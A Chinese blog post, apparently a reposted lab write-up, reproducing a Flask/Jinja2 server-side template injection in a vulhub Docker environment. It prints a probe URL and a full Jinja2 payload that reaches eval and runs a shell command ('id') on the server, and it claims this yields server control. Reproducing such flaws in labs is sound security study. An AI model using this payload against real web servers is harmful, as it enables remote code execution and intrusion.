首页 > 其他 > 详细

漏洞复现-Flask-SSTI服务端模板注入

时间:2020-09-29 13:06:15      阅读:93      评论:0      收藏:0      [点我收藏+]
 

0x00 实验环境

攻击机:Win 10

 

0x01 影响版本

Python利用的一些静态框架

 

0x02 漏洞复现

(1)实验环境:docker运行的vulhub漏洞环境

首先,可直接访问到页面的显示为:

技术分享图片

 

(2)查看到Hello guest的字样,使用别的方式查看漏洞风险是否存在:

 

http://xxx:8000/?name={{233*233}}

 

 技术分享图片

 

 

 (3)直接查询flask框架的代码执行语句
获取eval函数并执行任意python代码的POC:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == catch_warnings %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if eval in b.keys() %}
      {{ b[eval](__import__("os").popen("id").read()) }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

 

 

把name后的{{}}代码直接替换为上面的poc即可执行“id”这条Linux命令

 

技术分享图片

即可拿下服务器权限!

 

0x03 实验原理

这里我只能浅显的理解为:在网站使用静态flask框架搭建时,内部的函数调用了python内的一些高危的模块,导致可以直接与服务器端进行交互操作,具体原理你需要明白flask框架的使用,还有模块如何调用,以及模块本身存在的安全风险等问题,这里请自行研究。

 

原理请参考:

(1)https://github.com/vulhub/vulhub/tree/master/flask/ssti

(2)https://www.freebuf.com/articles/web/183188.html

 

漏洞复现-Flask-SSTI服务端模板注入

原文:https://www.cnblogs.com/cute-puli/p/13748585.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!